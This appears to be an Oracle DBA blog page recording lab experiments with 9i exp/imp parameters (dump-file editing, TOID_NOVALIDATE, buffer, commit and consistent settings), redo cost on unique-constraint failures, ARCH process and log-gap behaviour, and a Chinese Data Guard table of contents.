ALL_APPLY_KEY_COLUMNS          T_MYTEST(9, 10, 11)

 

SQL> conn yp/yaping

Connected.

SQL> create or replace type t_mytest as varray(10) of number;

  2  /

Type created.

SQL> create table t2(name varchar2(30),member t_mytest);

Table created.

 

$exp test/test tables=(t2) file=t2.dmp

 

Before modify the dump file.

$imp yp/yaping fromuser=test file=t2.dmp ignore=y

 

Import: Release 9.2.0.4.0 – Production on Mon Jun 11 04:00:19 2007

 

Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.

 

 

Connected to: Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production

With the Partitioning, OLAP and Oracle Data Mining options

JServer Release 9.2.0.4.0 – Production

 

Export file created by EXPORT:V09.02.00 via conventional path

 

Warning: the objects were exported by TEST, not by you

 

import done in US7ASCII character set and AL16UTF16 NCHAR character set

. importing TEST’s objects into YP

IMP-00061: Warning: Object type “YP”.”T_MYTEST” already exists with a different identifier

 “CREATE TYPE “T_MYTEST” TIMESTAMP ‘2007-06-11:02:43:07’ OID ‘3291809FE886C60″

 “9E040007F01002BAC’   as varray(10) of number;”

IMP-00063: Warning: Skipping table “YP”.”T2″ because object type “YP”.”T_MYTEST” cannot be created or has different identifier

Import terminated successfully with warnings.

 

Then we modify t2.dmp file. We use vi command to edit and find out the following contents and remove the connects highlighted with red color.

 

TABLE “T2”

BEGINTYPE “T_MYTEST” “3291809FE886C609E040007F01002BAC” “2186F75D29F3ED2CB659AE4D0AEE92E6C7”

“^@^@^@^@^^&^A^@^A^@^A)^@^@^@^@^@^S^\^@^@^@^]^@^@^@

^C*^F^@<81>^@^G

CREATE TYPE

媒每^^@CREATE TYPE “T_MYTEST” TIMESTAMP ‘2007-06-11:02:43:07’ OID ‘3291809FE886C609E040007F01002BAC’ ^A^@ ^Y^@ as varray(10) of numb;^@^@

GRANT EXECUTE ON “T_MYTEST” TO “YP”

ENDTYPE

CREATE TABLE “T2” (“NAME” VARCHAR2(30), “MEMBER” “T_MYTEST”)  PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “USERS” LOGGING NOCOMPRESS

 

 

After modify this file and save it, we import it again.

 

$ imp yp/yaping fromuser=test file=t2.dmp ignore=y

 

Import: Release 9.2.0.4.0 – Production on Mon Jun 11 04:02:39 2007

 

Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.

 

 

Connected to: Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production

With the Partitioning, OLAP and Oracle Data Mining options

JServer Release 9.2.0.4.0 – Production

 

Export file created by EXPORT:V09.02.00 via conventional path

 

Warning: the objects were exported by TEST, not by you

 

import done in US7ASCII character set and AL16UTF16 NCHAR character set

. importing TEST’s objects into YP

. . importing table                           “T2”         99 rows imported

Import terminated successfully without warnings.

 

 

This problem can also be resolved by set TOID_NOVALIDATE parameter.

 

$ imp yp/yaping fromuser=test touser=yp file=t2.dmp ignore=y TOID_NOVALIDATE=(t_mytest)

 

Import: Release 9.2.0.4.0 – Production on Mon Jun 11 04:04:16 2007

 

Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.

 

 

Connected to: Oracle9i Enterprise Edition Release 9.2.0.4.0 – Production

With the Partitioning, OLAP and Oracle Data Mining options

JServer Release 9.2.0.4.0 – Production

 

Export file created by EXPORT:V09.02.00 via conventional path

 

Warning: the objects were exported by TEST, not by you

 

import done in US7ASCII character set and AL16UTF16 NCHAR character set

. . skipping TOID validation on type YP.T_MYTEST

. . importing table                           “T2”         99 rows imported

Import terminated successfully without warnings.

 

 

 

l         Buffer, commit and consistent parameters

The default buffer size is too small, we need increase it to gain efficiency. Buffer and commit are usually used together, but we should bear in mind some side effects.

When we set commit=y, if the process of import abort, we maybe put the table’s data in an unknown status, and don’t decide where to start again. Before we use a feature which may cause dubious, we must be familiar with the application firstly.

Commit parameter can’t take effectually for some types, such LOB, LONG, REF, etc, these data will be committed every row.

Before we set consistent=y, we may consider if it’s meaningful that tables are exported in several times, put the tables which need be consistent into the same export, separated from others tables.

 

 

l         Trace parameter

If you want to know which SQL are performed when run exp/imp, there’s one easy method, you may specify parameter trace=y, it equals setting sql_trace and timed_statistics within this session. The old exp/imp release maybe have no this parameter.

 

 

l         Buffer parameter

If the buffer parameter is specified, where does it be allocated from, Database or OS?

 

We use one trigger to record the session’s statistics about memory allocation.

create or replace trigger trigger_logoff

before logoff on database

–before logoff on test.schema

declare

  v_program varchar2(48);

  v_sid number;

  v_paddr RAW(4);

begin

 

if user=’TEST’ then

 

   select sid,PROGRAM,paddr into v_sid,v_program,v_paddr from v$session where AUDSID=sys_context(‘userenv’,’sessionid’);

 

   insert into sys.sesstat select sid,name,value,sysdate,v_program from v$mystat a,v$statname b where a.STATISTIC#=b.STATISTIC# and (name like ‘%uga%’ or name like ‘%pga%’ or name = ‘user commits’);

 

   insert into procmem select v_sid,spid,PROGRAM,PGA_USED_MEM,PGA_ALLOC_MEM,PGA_FREEABLE_MEM,PGA_MAX_MEM,sysdate from v$process where addr=v_paddr;

 

end if;

 

exception

  when others then

       dbms_system.KSDWRT(2,sqlerrm);

 

end;

/

 

We use one demo table, its size is a little more than 250M.

SQL> analyze table test.t1 compute statistics;

 Table analyzed.

 

SQL> select OWNER,AVG_ROW_LEN,NUM_ROWS from dba_tables where table_name=’T1′;

 OWNER                          AVG_ROW_LEN   NUM_ROWS

—————————— ———– ———-

TEST                                  6016      44352

 

SQL> select 6016*44352/1024/1024 from dual;

 6016*44352/1024/1024

——————–

          254.460938

 

The following results show session memory allocation with different buffer value, default buffer value and 20M buffer.

       SID NAME                          VALUE DT                  PROGRAM

———- ———————— ———- ——————- ————————————————       

         9 session uga memory           158356 2007-12-29 15:03:48 imp@TCLUX3245 (TNS V1-V3)  –imp test/test  file=t1.dmp trace=y log=3.log ignore=y

         9 session uga memory max       162756 2007-12-29 15:03:48 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory           561736 2007-12-29 15:03:48 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory max       561736 2007-12-29 15:03:48 imp@TCLUX3245 (TNS V1-V3)

        

         9 session uga memory           132932 2007-12-29 15:06:22 imp@TCLUX3245 (TNS V1-V3)  –imp test/test  file=t1.dmp trace=y log=4.log ignore=y buffer=20971520

         9 session uga memory max       141108 2007-12-29 15:06:22 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory           408836 2007-12-29 15:06:22 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory max       408836 2007-12-29 15:06:22 imp@TCLUX3245 (TNS V1-V3)

        

 

According to the following result we can confirm that the buffer value took effect.

       SID NAME                                VALUE DT                  PROGRAM

———- —————————— ———- ——————- ——————————

        14 user commits                            1 2007-12-29 14:21:29 imp@TCLUX3245 (TNS V1-V3) –imp test/test  file=t1.dmp trace=y log=p1.log ignore=y buffer=20971520

        14 session uga memory                 134040 2007-12-29 14:21:29 imp@TCLUX3245 (TNS V1-V3)

        14 session uga memory max             138440 2007-12-29 14:21:29 imp@TCLUX3245 (TNS V1-V3)

        14 session pga memory                 425860 2007-12-29 14:21:29 imp@TCLUX3245 (TNS V1-V3)

        14 session pga memory max             425860 2007-12-29 14:21:29 imp@TCLUX3245 (TNS V1-V3)

 

         9 user commits                           13 2007-12-29 14:52:04 imp@TCLUX3245 (TNS V1-V3) –imp test/test  file=t1.dmp trace=y log=p1.log ignore=y buffer=20971520 commit=y

         9 session uga memory                 165040 2007-12-29 14:52:04 imp@TCLUX3245 (TNS V1-V3)

         9 session uga memory max             186384 2007-12-29 14:52:04 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory                 572832 2007-12-29 14:52:04 imp@TCLUX3245 (TNS V1-V3)

         9 session pga memory max             572832 2007-12-29 14:52:04 imp@TCLUX3245 (TNS V1-V3)

 

 

 SID       SPID PROGRAM                        PGA_USED_MEM PGA_ALLOC_MEM PGA_FREEABLE_MEM PGA_MAX_MEM DT

—- ———- —————————— ———— ————- —————- ———– ——————-

  14       4500 oracle@TCLUX3245 (TNS V1-V3)         435321        480213                0      480213 2007-12-29 14:21:29

   9       4884 oracle@TCLUX3245 (TNS V1-V3)         562997        627185                0      627185 2007-12-29 14:52:04

 

From the above result, we can conclude that the value of buffer parameter doesn’t be allocated from database. Now we observe the processes through ps command.

Relation between parent-child processes display clearly that the value of buffer parameter comes from imp/exp command.

———————————————————————

USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND

 

root     31739  0.0  0.1  6860 1080 ?        S    Dec27   0:00  \_ sshd: oracle [priv]

oracle   31741  0.0  0.1  7020 1204 ?        S    Dec27   0:01  |   \_ sshd: oracle@pts/7

oracle   31744  0.0  0.1  4404 1196 pts/7    S    Dec27   0:00  |       \_ -bash

oracle    5049  7.7  2.5 33508 25492 pts/7   S    15:32   0:02  |           \_ imp           file=t1.dmp trace=y log=p1.log ig

oracle    5050 12.3  6.4 269728 65472 ?      S    15:32   0:04  |               \_ oracleO02DMS0 (DESCRIPTION=(LOCAL=YES)(ADDR

 

–imp test/test  file=t1.dmp trace=y log=p1.log ignore=y buffer=20971520 commit=y

–buffer=20971520 =20M

–25492 KB

 

root     31739  0.0  0.1  6860 1080 ?        S    Dec27   0:00  \_ sshd: oracle [priv]

oracle   31741  0.0  0.1  7020 1204 ?        S    Dec27   0:01  |   \_ sshd: oracle@pts/7

oracle   31744  0.0  0.1  4404 1200 pts/7    S    Dec27   0:00  |       \_ -bash

oracle    5125  1.3  0.4 13028 4988 pts/7    S    16:08   0:06  |           \_ imp           file=t1.dmp trace=y log=p1.log ig

oracle    5126  2.1  6.4 269712 65772 ?      S    16:08   0:09  |               \_ oracleO02DMS0 (DESCRIPTION=(LOCAL=YES)(ADDR

 

–imp test/test  file=t1.dmp trace=y log=p1.log ignore=y

 

———————————————————————

 

 

l         Unique constraint violated

Unique constraint may use unique index or none-unique index, but the two type indexes are different when to validate the constraint.

Unique index, first generate redo and undo, then modify data blocks which contain DML rows, validate constraint, if available, generate redo and undo for index entries, then modify index entries, if fail, then redo owed to validation failure and implicit rollback against table.

None-unique index, first generate redo and undo, then modify data blocks which contain DML rows, generate redo and undo for index entries, modify index entries, validate constraint, if fail, then redo owed to validation failure and implicit rollback against index, then rollback table.

The import utility will be extremely costly if data being imported fail a unique constraint. As is the case with standard insert operations the redo cost for failed rows via imp is influenced by the type of index used to enforce the unique constraint. Aside from the index-type influence the number of failed rows per batch violating a unique constraint greatly impacts the redo generated. The buffer parameter will control the number per batch.

 

I illuminate it with the following experiment.

test@CHEN>create table t1(id number);

Table created.

 

test@CHEN>create table t2(id number);

Table created.

 

test@CHEN>alter table t1 add constraint t1_pk primary key(id);

Table altered.

 

test@CHEN>create index idx_t2_id on t2(id);

Index created.

 

test@CHEN>alter table t2 add constraint t2_pk primary key(id) using index;

Table altered.

 

test@CHEN>insert into t1 select rownum from dual connect by level<16;

15 rows created.

 

test@CHEN>insert into t2 select rownum from dual connect by level<16;

15 rows created.

 

test@CHEN>commit;

Commit complete.

 

test@CHEN>!exp test/test tables=(t1,t2) file=t1_t2.dmp silent=y

About to export specified tables via Conventional Path …

. . exporting table                             T1         15 rows exported

. . exporting table                             T2         15 rows exported

Export terminated successfully without warnings.

 

test@CHEN>delete from t2 where id<6 or id>10;

10 rows deleted.

 

test@CHEN>delete from t1 where id<6 or id>10;

10 rows deleted.

 

test@CHEN>commit;

Commit complete.

 

test@CHEN>!imp test/test file=t1_t2.dmp ignore=y silent=y

Export file created by EXPORT:V09.02.00 via conventional path

. importing TEST’s objects into TEST

. . importing table                           “T1”

IMP-00019: row rejected due to ORACLE error 1

IMP-00003: ORACLE error 1 encountered

. . importing table                           “T2”

IMP-00019: row rejected due to ORACLE error 1

IMP-00003: ORACLE error 1 encountered

ORA-00001: unique constraint (TEST.T2_PK) violated

Column 1 6

 

Through checking redo log, Oracle performed the following actions.

T1

STEP 1

Multiple rows insert(1..15), controled by buffer parameter

 

STEP 2

Index leaf rows insert through array, stop when value=6, then clean

 

SETP 3

Multiple rows delete(1..15), all rows insert just now

 

STEP 4

Single row insert value 1, then insert index leaf row

Repeat above actions with row value from 2 to 5

 

STEP 5

Multiple rows insert(7..15), skip the value last failed, then start from there

 

STEP 6

Multiple rows delete(7..15)

 

STEP 7

Repeat STEP 5 & 6, until value is 10

 

STEP 8

Multiple rows insert(11..15)

 

STEP 9

Index leaf rows insert through array

 

STEP 10

Mark this transaction committed

 

T2

STEP 1

Multiple rows insert(1..15), controled by buffer parameter

 

STEP 2

Index leaf row insert, start from value 1 to 5

 

STEP 3

Index leaf row insert, value=6, validate failed, then clean all leaf rows

 

STEP 4

Multiple rows delete(1..15), all rows insert just now

 

STEP 5

Single row insert value 1, then insert index leaf row

Repeat above actions with row value from 2 to 5

 

STEP 6

Multiple rows insert(7..15), skip the value last failed, then start from there

Index leaf row insert, value=7, validate failed, then clean

 

STEP 7

Repeat STEP 6 until value is 10

 

STEP 8

Perform STEP 1 & 2

 

STEP 9

Mark this transaction committed

 

From above result we can find out that it’ll generate mass redo if import encounters unique constraint violated issue.

 

 

l         Can we export a table and import into another table

 

Maybe.

 

[oracle@chen ~]$ exp test/test tables=t2 file=t2.dmp silent=y

About to export specified tables via Conventional Path …

. . exporting table                             T2         10 rows exported

Export terminated successfully without warnings.

 

Edit dump file t2.dmp with vi tools, change all T2 words to T8 in the file, then save it.

 

[oracle@chen ~]$ vi t2.dmp

TABLE “T2”

CREATE TABLE “T2” (“ID” NUMBER)  PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” LOGGING NOCOMPRESS

INSERT INTO “T2” (“ID”) VALUES (:1)

^A^@^B^@^V^@^@^@^@^@^B^@Ã^B^@^@^B^@Ã^C^@^@^B^@Ã^D^@^@^B^@Ã^E^@^@^B^@Ã^F^@^@^B^@Ã^G^@^@^B^@Ã^H^@^@^B^@à ^@^@^B^@Ã

^@^@^B^@Ã^K^@^@ÿÿ

CREATE INDEX “IDX_T2_ID” ON “T2” (“ID” )  PCTFREE 10 INITRANS 2 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” LOGGING

 

[oracle@chen ~]$ strings t2.dmp

EXPORT:V09.02.00

UTEST

RTABLES

8192

                                        Fri Jun 27 0:34:44 2008t2.dmp

#C##

#C##

+08:00

BYTE

INTERPRETED

TABLE “T8”

CREATE TABLE “T8” (“ID” NUMBER)  PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” LOGGING NOCOMPRESS

INSERT INTO “T8” (“ID”) VALUES (:1)

CREATE INDEX “IDX_T8_ID” ON “T8” (“ID” )  PCTFREE 10 INITRANS 2 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” LOGGING

EXIT

EXIT

 

[oracle@chen ~]$ imp test/test file=t2.dmp silent=y

Export file created by EXPORT:V09.02.00 via conventional path

. importing TEST’s objects into TEST

. . importing table                           “T8”         10 rows imported

Import terminated successfully without warnings.

 

The above method is very dangerous, there’s easy approach. We just create the same structure table T8 first, then create synonym named T2 which refer to T8 and import data.

 

 

l         Consistent parameter

 

Prepare for data.

Session 1

test@CHEN>create table t1 as select rownum id from dual connect by level<5;

Table created.

 

test@CHEN>create table t2 as select rownum id from dual connect by level<5;

Table created.

 

test@CHEN>create table t3 as select rownum id from dual connect by level<5;

Table created.

 

test@CHEN>create table t4 as select rownum id from dual connect by level<5;

Table created.

 

test@CHEN>create or replace function f_test(p_str varchar2)

  2    return varchar2 as

  3  begin

  4    return p_str;

  5    exception

  6    when others then

  7         return ‘ERROR’;

  8  end;

  9  /

Function created.

 

We consider how to slow down export progress.

Session 2

sys@CHEN>AUDIT SELECT ON test.t1 WHENEVER SUCCESSFUL;

Audit succeeded.

 

sys@CHEN>create or replace trigger after_audit

  2  after insert or update on sys.aud$

  3  begin

  4    dbms_lock.sleep(60);

  5  end;

  6  /

create or replace trigger after_audit

                          *

ERROR at line 1:

ORA-04089: cannot create triggers on objects owned by SYS

 

sys@CHEN>create table system.aud$ as select * from sys.aud$ where 1=2;

Table created.

 

sys@TEST>drop table sys.aud$;

Table dropped.

 

sys@CHEN>create synonym aud$ for system.aud$;

Synonym created.

 

sys@CHEN>create or replace trigger after_audit

  2    after insert or update on system.aud$

  3    begin

  4      dbms_lock.sleep(60);

  5    end;

  6  /

Trigger created.

 

Export with consistent=y parameter

Session 2

sys@CHEN>!exp test/test file=test.dmp CONSISTENT=y trace=y silent=y

About to export specified users …

. exporting pre-schema procedural objects and actions

. exporting foreign function library names for user TEST

. exporting PUBLIC type synonyms

. exporting private type synonyms

. exporting object type definitions for user TEST

About to export TEST’s objects …

. exporting database links

. exporting sequence numbers

. exporting cluster definitions

. about to export TEST’s tables via Conventional Path …

. . exporting table                             T1          4 rows exported –hold on 240 seconds

. . exporting table                             T2          4 rows exported

. . exporting table                             T3          4 rows exported

. . exporting table                             T4

EXP-00056: ORACLE error 942 encountered

ORA-00942: table or view does not exist

. exporting synonyms

. exporting views

. exporting stored procedures

. exporting operators

. exporting referential integrity constraints

. exporting triggers

. exporting indextypes

. exporting bitmap, functional and extensible indexes

. exporting posttables actions

. exporting materialized views

. exporting snapshot logs

. exporting job queues

. exporting refresh groups and children

. exporting dimensions

. exporting post-schema procedural objects and actions

. exporting statistics

Export terminated successfully with warnings.

 

After submit exp command in session 2, run the following SQL in another session immediately.

Session 1

test@CHEN>@case1

test@CHEN>insert into t1 values(-1);

1 row created.

 

test@CHEN>insert into t2 values(-1);

1 row created.

 

test@CHEN>alter table t3 add a varchar2(1) default ‘Y’;

Table altered.

 

test@CHEN>drop table t4;

Table dropped.

 

test@CHEN>create table t5 as select * from t2;

Table created.

 

test@CHEN>

test@CHEN>create or replace function f_test(p_str varchar2)

  2    return varchar2 as

  3  begin

  4    return ‘consistent=y:’||p_str;

  5    exception

  6    when others then

  7         return ‘ERROR’;

  8  end;

  9  /

Function created.

 

Check the exported data.

Session 2

sys@CHEN>!imp test/test file=test.dmp rows=n show=y silent=y full=y

Export file created by EXPORT:V09.02.00 via conventional path

. importing TEST’s objects into TEST

 “BEGIN 

 “CREATE TABLE “T3” (“ID” NUMBER)  PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS “

 “255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” “

 “LOGGING NOCOMPRESS”

. . skipping table “T3”

 

 “CREATE TABLE “T4” (“ID” NUMBER)  PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS “

 “255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) TABLESPACE “TEST” “

 “LOGGING NOCOMPRESS”

. . skipping table “T4”

 

“CREATE function f_test(p_str varchar2)”

   return varchar2 as”

 “begin”

   return p_str;”

   exception”

   when others then”

        return ‘ERROR’;”

 “end;”

Import terminated successfully without warnings.

 

From above output, we can see that the definition of dropped table still be exported, but it doesn’t contain any data. Even though the table’s structure changed, it exports the previous definition, new objects don’t be exported.

 

Export with consistent=n parameter

 

Session 2

sys@CHEN>!exp test/test file=test.dmp consistent=n trace=y silent=y

About to export specified users …

. exporting pre-schema procedural objects and actions

. exporting foreign function library names for user TEST

. exporting PUBLIC type synonyms

. exporting private type synonyms

. exporting object type definitions for user TEST

About to export TEST’s objects …

. exporting database links

. exporting sequence numbers

. exporting cluster definitions

. about to export TEST’s tables via Conventional Path …

. . exporting table                             T1          4 rows exported — hold on

. . exporting table                             T2          5 rows exported

. . exporting table                             T3          4 rows exported

. . exporting table                             T4

EXP-00007: dictionary shows no columns for TEST.T4

. exporting synonyms

. exporting views

. exporting stored procedures

. exporting operators

. exporting referential integrity constraints

. exporting triggers

. exporting indextypes

. exporting bitmap, functional and extensible indexes

. exporting posttables actions

. exporting materialized views

. exporting snapshot logs

. exporting job queues

. exporting refresh groups and children

. exporting dimensions

. exporting post-schema procedural objects and actions

. exporting statistics Export terminated successfully with warnings.

 

After submit exp command in session 2, run the following SQL in another session immediately.

Session 1

Tables t1, t2, t3, t4 have been recreated before run the above export.

test@CHEN>@case2

test@CHEN>insert into t1 values(-1);

1 row created.

 

test@CHEN>insert into t2 values(-1);

1 row created.

 

test@CHEN>alter table t3 add a varchar2(1) default ‘Y’;

Table altered.

 

test@CHEN>drop table t4;

Table dropped.

 

test@CHEN>

test@CHEN>create table t5 as select * from t2;

Table created.

 

test@CHEN>create or replace function f_test(p_str varchar2)

  2    return varchar2 as

  3  begin

  4    return ‘consistent=n:’||p_str;

  5    exception

  6    when others then

  7         return ‘ERROR’;

  8  end;

  9  /

Function created.

 

Check the exported data.

Session 2

sys@CHEN>!imp test/test file=test.dmp rows=n show=y silent=y full=y

Export file created by EXPORT:V09.02.00 via conventional path

. importing TEST’s objects into TEST

 “BEGIN 

 “CREATE TABLE “T3” (“ID” NUMBER, “A” VARCHAR2(1))  PCTFREE 10 PCTUSED 40 INI”

 “TRANS 1 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) T”

 “ABLESPACE “TEST” LOGGING NOCOMPRESS”

 ” ALTER TABLE “T3” MODIFY (“A” DEFAULT ‘Y’)”

. . skipping table “T3”

“CREATE function f_test(p_str varchar2)”

   return varchar2 as”

 “begin”

   return ‘consistent=n:’||p_str;”

   exception”

   when others then”

        return ‘ERROR’;”

 “end;”

Import terminated successfully without warnings.

 

We can find that the dropped table is gone, and changed objects export their definition and data at the point of reading them, but don’t contain new objects.

 

Export with object_consistent=y parameter

 

Session 2

sys@CHEN>!exp test/test file=test.dmp OBJECT_CONSISTENT=y trace=y silent=y

About to export specified users …

. exporting pre-schema procedural objects and actions

. exporting foreign function library names for user TEST

. exporting PUBLIC type synonyms

. exporting private type synonyms

. exporting object type definitions for user TEST

About to export TEST’s objects …

. exporting database links

. exporting sequence numbers

. exporting cluster definitions

. about to export TEST’s tables via Conventional Path …

. . exporting table                             T1          4 rows exported –hold on

. . exporting table                             T2          5 rows exported

. . exporting table                             T3          4 rows exported

. . exporting table                             T4

EXP-00007: dictionary shows no columns for TEST.T4

. exporting synonyms

. exporting views

. exporting stored procedures

. exporting operators

. exporting referential integrity constraints

. exporting triggers

. exporting indextypes

. exporting bitmap, functional and extensible indexes

. exporting posttables actions

. exporting materialized views

. exporting snapshot logs

. exporting job queues

. exporting refresh groups and children

. exporting dimensions

. exporting post-schema procedural objects and actions

. exporting statistics

Export terminated successfully with warnings.

 

After submit exp command in session 2, run the following SQL in another session immediately.

 

Session 1

Tables t1, t2, t3, t4 have been recreated before run the above export.

test@CHEN>@case3

test@CHEN>insert into t1 values(-1);

1 row created.

 

test@CHEN>insert into t2 values(-1);

1 row created.

 

test@CHEN>alter table t3 add a varchar2(1) default ‘Y’;

Table altered.

 

test@CHEN>drop table t4;

Table dropped.

 

test@CHEN>

test@CHEN>create table t5 as select * from t2;

Table created.

 

test@CHEN>create or replace function f_test(p_str varchar2)

  2    return varchar2 as

  3  begin

  4    return ‘object_consistent=y:’||p_str;

  5    exception

  6    when others then

  7         return ‘ERROR’;

  8  end;

  9  /

Function created.

 

Check the exported data.

Session 2

sys@CHEN>!imp test/test file=test.dmp rows=n show=y silent=y full=y

Export file created by EXPORT:V09.02.00 via conventional path

. importing TEST’s objects into TEST

 “BEGIN 

 “CREATE TABLE “T3” (“ID” NUMBER, “A” VARCHAR2(1))  PCTFREE 10 PCTUSED 40 INI”

 “TRANS 1 MAXTRANS 255 STORAGE(INITIAL 65536 FREELISTS 1 FREELIST GROUPS 1) T”

 “ABLESPACE “TEST” LOGGING NOCOMPRESS”

 ” ALTER TABLE “T3” MODIFY (“A” DEFAULT ‘Y’)”

. . skipping table “T3”

…”

 “CREATE function f_test(p_str varchar2)”

   return varchar2 as”

 “begin”

   return ‘object_consistent=y:’||p_str;”

   exception”

   when others then”

        return ‘ERROR’;”

 “end;”

Import terminated successfully without warnings.

 

 

From above results, it seems that tables are obtained at beginning of export.

 

 

 

l         Others

There’s one tool which can extract DDL statements from dump file. Refer to http://www.ddlwizard.com/.

 

ARCH relevant

Filed under: Oracle — Yaping @ 4:29 am
Tags:

Previous Oracle 10g, when ARCH process need archive redo log, it firstly build an archive destination list. Once this list is completed, the ARCH process reads 1 MB chunk of redo log data that is to be archived. The chunk size is controlled by one hidden parameter called _log_archive_buffer_size, its default value is 2048 redo log blocks, the redo log block size is 512 byte, so the chunk size is just 1 MB. Then this 1MB chunk is sent to the first destination in the list, after write has completed, the same 1 MB chunk is sent to the second destination. It continues until this chunk data has been written to all destinations. Next, the ARCH process reads the next 1MB chunk of redo log, repeats the above actions until this redo log has been written to all destination. So archiving is only as fast as the slowest destination.

 

So what will happen if the writing progress is slow or dead?

In some situations, the network is slow or the server is under hard work load, it can cause the arch progress is very slow. If the redo log does not be archived completely, the database can switch to the next redo log file if there’re redo log groups available. It is possible that the log writer process recycles through all available online redo log groups and tries to use the redo log file which has not yet been archived completely. Now the database will be suspended.

If the ARCH process can’t get response from archive destination, the network or server is maybe dead, the result will be different from progress slow. The unavailable destination just be closed from archive and the ARCH process continues to archive log to available destinations. The OPTIONAL and MANDATORY parameters just control that whether the online redo log file can be reused when this redo log doesn’t be completed archive to the destination.

 

We may pay more attention if there’re archive destinations through network (NFS or standby). If the data is transmitted over a slow network, no error is encountered and the destination is not closed. Transmission continues, but is very slow. Ultimately, the database will be suspended caused by lack for available redo log groups.

 

Since Oracle 9.2.0.5, it introduces one parameter called _LOG_ARCHIVE_CALLOUT, allow the DBA to change the default behavior:

_LOG_ARCHIVE_CALLOUT=’LOCAL_FIRST=TRUE’

If this parameter is set and the standby adopts ARCH process to archive log, then the ARCH process will archive to the local destination first. Once the redo log has been completely and successfully archived at least one local destination, it will then be transmitted to the remote destination. This is default behavior since Oracle 10g Release 1.

 

 

@>@getPar

Enter value for parameter: _log_archive_buffer_size

old   6: ksppinm like lower(‘%&parameter%’)

new   6: ksppinm like lower(‘%_log_archive_buffer_size%’)

NAME                                     VALUE                                    DESCRIPTION

—————————————- —————————————- —————————————-

_log_archive_buffer_size                 2048                                     Size of each archival buffer in log file

                                                                                   Blocks

The max value is 2048 within Oracle 9i under Linux.

 

[oracle@chen ~]$ ps -ef|grep arc

oracle   12148     1  0 03:25 ?        00:00:00 ora_arc0_chen

oracle   12150     1  0 03:25 ?        00:00:00 ora_arc1_chen

oracle   12529 12495  1 04:34 pts/9    00:00:00 grep arc

 

[oracle@chen ~]$ strace -p 12148 -o ora_arc0_chen.log &

[1] 12532

 

[oracle@chen ~]$ strace -p 12150 -o ora_arc1_chen.log &

[2] 12559

 

@>alter system switch logfile;

System altered.          

 

We can find the similar following records in the trace files.

… …

open(“/u03/oradata/9208/chen/redo02.log”, O_RDONLY|O_DIRECT|O_LARGEFILE) = 16

… …

open(“/u03/oradata/arch/1_329.dbf”, O_RDWR|O_SYNC|O_DIRECT|O_LARGEFILE) = 18

… …

pread(16, “I\1\1c\241\201&\270\326 \t \t\200″…, 1048576, 512) = 1048576

… …

pwrite(18, “I\1\1\10M\241\201&D\212\233                “…, 1048576, 1049088) = 1048576

… …

 

 

@>@getPar

Enter value for parameter: _log_archive_callout

old   6: ksppinm like lower(‘%&parameter%’)

new   6: ksppinm like lower(‘%_log_archive_callout%’)

NAME                                     VALUE                                    DESCRIPTION

—————————————- —————————————- —————————————-

_log_archive_callout          

 

 

Logs gap resolution

Since Oracle 9i Release 1, automatic gap resolution is implemented during log transport processing. As the LGWR or ARCH process begins to send redo over to the standby, the sequence number of the log being archived is compared to the last sequence received by the RFS process on the standby. If the RFS process detects that the archive log being received is greater than the last sequence received plus one, then the RFS will piggyback a request to the primary to send the missing archive logs.

 

Starting in Oracle Release 2, automatic gap resolution has been enhanced. In addition to the above, the ARCH process on the primary database polls all standby databases every minute to see if there is a gap in the sequence of archived redo logs. If a gap is detected then the ARCH process sends the missing archived redo log files to the standby databases that reported the gap. Once the gap is resolved, the LGWR process is notified that the site is up to date.

 

If the MRP process finds that the archived log is missing or is corrupt on standby, FAL is called to resolve the gap or obtain a new copy.  Since MRP has no direct communications link with the primary, it must use the FAL_SERVER and FAL_CLIENT initialization parameters to resolve the gap. Both of these parameters must be set in the standby site. The two parameters are defined as:

 

FAL_SERVER: An OracleNet service name that exist in the standby tnsnames.ora file that points to the primary database listener.

FAL_CLIENT: An OracleNet service name that exist in the primary tnsnames.ora file that points to the standby database listener.

 

Once MRP needs to resolve a gap it uses the value from FAL_SERVER to call the primary database. Once communication with the primary has been established, MRP passes the FAL_CLIENT value to the primary ARCH process. The primary ARCH process locates the remote archive destination with the corresponding service name and ships the missing archived redo logs.

 

 

Archive process

When we take a database backup, we generally archive current redo log first, after backup datafiles, we archive current redo log again. We can achieve it by using commands alter system switch logfile or alter system archive log current. They have a different. The switch command will fire background process to archive log and return back to the command line immediately. So we can continue to next tasks, but the archive task maybe doesn’t be completed. But the archive command will fire this user process to archive log, it doesn’t return to the command line until it complete to archive. So we should consider use the archive command to archive current log when we write backup scripts.

 

We can use the following experiment to confirm it.

 

@>@myid

Wrote file /tmp/myvar.sql

sid:10 serial:7 pid:11 spid:12691

 

[oracle@chen ~]$ strace -p 12691 -o 12691.log &

[3] 12693

 

@>alter system archive log current;

System altered.

 

Physical Data Guard创建及恢复

Filed under: Oracle — Yaping @ 4:25 am
Tags:

准备1

案例一2

案例二3

案例三4

维护7

激活Data Guard Database. 7

通过RESETLOGS的恢复8

附件A11

附件B12

